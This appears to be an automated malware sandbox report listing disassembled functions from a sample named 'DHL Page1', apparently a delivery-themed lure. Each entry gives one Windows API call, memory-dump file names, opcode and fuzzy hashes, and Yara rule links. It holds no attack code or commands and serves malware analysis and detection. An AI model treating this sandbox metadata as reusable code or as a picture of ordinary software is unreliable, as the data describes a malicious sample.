Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 374bdd7bc19fcd8113a2432eab3093b45824ff94ff1b8729b4d6be872bad36fb
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: 6DC04C31244B019AD6506B60DF087177954AB54781F158839A546E00A0DE348465EB2D

Function 00402805 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823

Part of subcall function 0040617B: wsprintfW.USER32 ref: 00406188

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 5636e1e78dddd1fcfcda9129bc1d9726c407c1e9b27ab1c7d440e1e4fec20889
Instruction ID: 1b184e92661537bb87de98d2befb21e1da1976e88d53c1f715dd780c7293573d
Opcode Fuzzy Hash: 5636e1e78dddd1fcfcda9129bc1d9726c407c1e9b27ab1c7d440e1e4fec20889
Instruction Fuzzy Hash: C7E0ED71A04104AEDB11DBA5AE49CAE77B8DB40318B11483BF502B50D1CBB949529A2D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 28370d6ec14c2864ce4c730428473a0f0cb9377b0d30d624432952373aa36a23
Instruction ID: 9aecaae10a8fa0ae14d0a9bfb73aa5550fc7421d408735c07da4fcd068d819ed
Opcode Fuzzy Hash: 28370d6ec14c2864ce4c730428473a0f0cb9377b0d30d624432952373aa36a23
Instruction Fuzzy Hash: 98E08072304104ABD710DF65DE49AAB7798DF5036CF20853AF613E60C1D6F49A41973D

Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b2e4f54b90f2ef0aa51ec1bc775a92caf8dba577625335006bca79b029b1dbad
Instruction ID: eaeeaa8b8a331aa3a09e344b0f7e4ee1109a300b49ea3f9035d81eb295fd1207
Opcode Fuzzy Hash: b2e4f54b90f2ef0aa51ec1bc775a92caf8dba577625335006bca79b029b1dbad
Instruction Fuzzy Hash: CAE08C76280108BFDB00EFA4EE4BFE937ECAB14744F008025B608EB0E1C674E5508BA8

Function 00405E8C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041EA30,00416A30,00403421,0040A230,0040A230,00403325,0041EA30,00004000,?,00000000,004031CF), ref: 00405EA0

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: 21ea84d6e30e3e1d6adabcf0c58a4e7f418a4fd28b3d755d78f19fcef630ff57
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 40E08C3220121AABEF119F65DC00AEB3B6CFF05361F004432F990E6280D630E9218BE4

Function 00405EBB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041AA23,00416A30,004033A5,00416A30,0041AA23,0A,0041EA30,00004000,?,00000000,004031CF), ref: 00405ECF

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 46774958090823e663cecc1425485f4f8cffaa3e8fa84660ad0031be83659422
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 22E0EC3226425AABDF109F55DC00EEB7B6CEB093A4F044837F955E3150D631EA219BE4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ebc6f0108ff20c7391e8834be7fc24cdfbaf299f9058229d1ea4fb54f603d532
Instruction ID: 6d0c2819641a95d4824ed615a3e4b51c4d1dd376adb528a119f99556ba9dc2b5
Opcode Fuzzy Hash: ebc6f0108ff20c7391e8834be7fc24cdfbaf299f9058229d1ea4fb54f603d532
Instruction Fuzzy Hash: A9D012327041049BDB10DBA4AB4869E73A0EB40369B218577D602F21D0D6F9CA919B29

Function 00404344 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(000103D6,00000000,00000000,00000000), ref: 00404356

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e4efbfa6a270d18bca2febec8f1cc7f76d5f2411a90ca5703cf2d1d509f33866
Instruction ID: 443f8e187224da6cfa76d7980b8ed720e6d4cbbe41b10c3d2bc684570ca6bb16
Opcode Fuzzy Hash: e4efbfa6a270d18bca2febec8f1cc7f76d5f2411a90ca5703cf2d1d509f33866
Instruction Fuzzy Hash: E3C09B727407017BDA109F509D46F1777586754701F1954397750F60D0C6B4D410D61C

Function 00403424 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403124,?), ref: 00403432

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Function 0040432D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00404159), ref: 0040433B

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 64a68407c836843c56221a615a792e6a52c16efb0fea1465c7842f5a417f251c
Instruction ID: 64a08a55ceea2d1558f6d4f7f42fa5e28cf6011975d693489571b8877d5ffd11
Opcode Fuzzy Hash: 64a68407c836843c56221a615a792e6a52c16efb0fea1465c7842f5a417f251c
Instruction Fuzzy Hash: 7EB0123A180A00BBDE114B00EE09F857E72F7AC702F018438B340240F0CAB200A0DB08

Function 0040431A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004040F2), ref: 00404324

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a4072936c0dbda19daad3b6f87af0b9df629bfb569434203df2f15330338b18f
Instruction ID: 673d5dedd718a1dacc8ea30d6c65fccf4d4c02135a1364ed0a3c52864c45ce1c
Opcode Fuzzy Hash: a4072936c0dbda19daad3b6f87af0b9df629bfb569434203df2f15330338b18f
Instruction Fuzzy Hash: 26A00176944501EBCE529B90EF49D0ABB62ABA4701B5185B9A285900348A328862EB69

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eea317c68a79a24d97d9dad49be95b0dd66468f040e9051977c3d92c9375d134
Instruction ID: ecb70030333676b341232910d06f26a8d16b92bd81aad1b8438947e9240f7980
Opcode Fuzzy Hash: eea317c68a79a24d97d9dad49be95b0dd66468f040e9051977c3d92c9375d134
Instruction Fuzzy Hash: 5DD05E73A141048BD710DBB8BE8589E73A8E7403293218837D002E20D1E6B8C8424A28

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

